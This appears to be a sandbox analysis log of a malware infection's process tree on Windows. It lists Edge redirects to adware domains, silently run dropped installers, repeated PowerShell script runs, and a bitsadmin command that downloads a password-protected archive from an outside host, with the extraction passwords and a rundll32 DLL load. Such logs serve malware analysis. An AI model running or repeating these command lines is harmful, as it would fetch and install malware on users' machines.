C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4868 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5440 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:110⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3972 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5860 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3136 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6044 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6304 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6506692207938420626,1067957909966550227,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471810⤵
-
C:\Users\Admin\AppData\Local\Temp\64-adea2-d79-4c2a6-51de532b86842\Vonacoreqa.exe"C:\Users\Admin\AppData\Local\Temp\64-adea2-d79-4c2a6-51de532b86842\Vonacoreqa.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\installer.exeC:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\installer.exe /qn CAMPAIGN="654"10⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\4ol2ric5.d2d\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633365428 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ojxdrcab.0sx\any.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ojxdrcab.0sx\any.exeC:\Users\Admin\AppData\Local\Temp\ojxdrcab.0sx\any.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qva1kxpe.3fm\DownFlSetup122.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\qva1kxpe.3fm\DownFlSetup122.exeC:\Users\Admin\AppData\Local\Temp\qva1kxpe.3fm\DownFlSetup122.exe10⤵
-
C:\Users\Admin\AppData\Roaming\8273011.scr"C:\Users\Admin\AppData\Roaming\8273011.scr" /S11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ioxsjw32.qyl\Browser4Download.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ioxsjw32.qyl\Browser4Download.exeC:\Users\Admin\AppData\Local\Temp\ioxsjw32.qyl\Browser4Download.exe10⤵
-
C:\Users\Admin\AppData\Roaming\2113420.scr"C:\Users\Admin\AppData\Roaming\2113420.scr" /S11⤵
-
C:\Users\Admin\AppData\Roaming\2785272.scr"C:\Users\Admin\AppData\Roaming\2785272.scr" /S11⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tp1qep3v.2of\cust2.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\tp1qep3v.2of\cust2.exeC:\Users\Admin\AppData\Local\Temp\tp1qep3v.2of\cust2.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lkm4dn1w.kb1\autosubplayer.exe /S & exit9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Users\Admin\AppData\Local\Temp\lkm4dn1w.kb1\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\lkm4dn1w.kb1\autosubplayer.exe /S10⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z11⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pPbRz4ETRZ9bWlRf -y x C:\zip.7z -o"C:\Program Files\temp_files\"11⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pnczkWtKvNiK8PYi -y x C:\zip.7z -o"C:\Program Files\temp_files\"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\SMBbvCSuKLI\SMBbvCSuKLI.dll" SMBbvCSuKLI11⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\SMBbvCSuKLI\SMBbvCSuKLI.dll" SMBbvCSuKLI12⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdA7EB.tmp\tempfile.ps1"11⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\so2hbdtn.lkf\installer.exe /qn CAMPAIGN=654 & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\so2hbdtn.lkf\installer.exeC:\Users\Admin\AppData\Local\Temp\so2hbdtn.lkf\installer.exe /qn CAMPAIGN=65410⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10acd1e0a9e6.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10acd1e0a9e6.exeFri10acd1e0a9e6.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 2446⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10720d229511df563.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10720d229511df563.exeFri10720d229511df563.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 18766⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10d184202996a0d7f.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1018ef4aa251c026c.exe4⤵
-
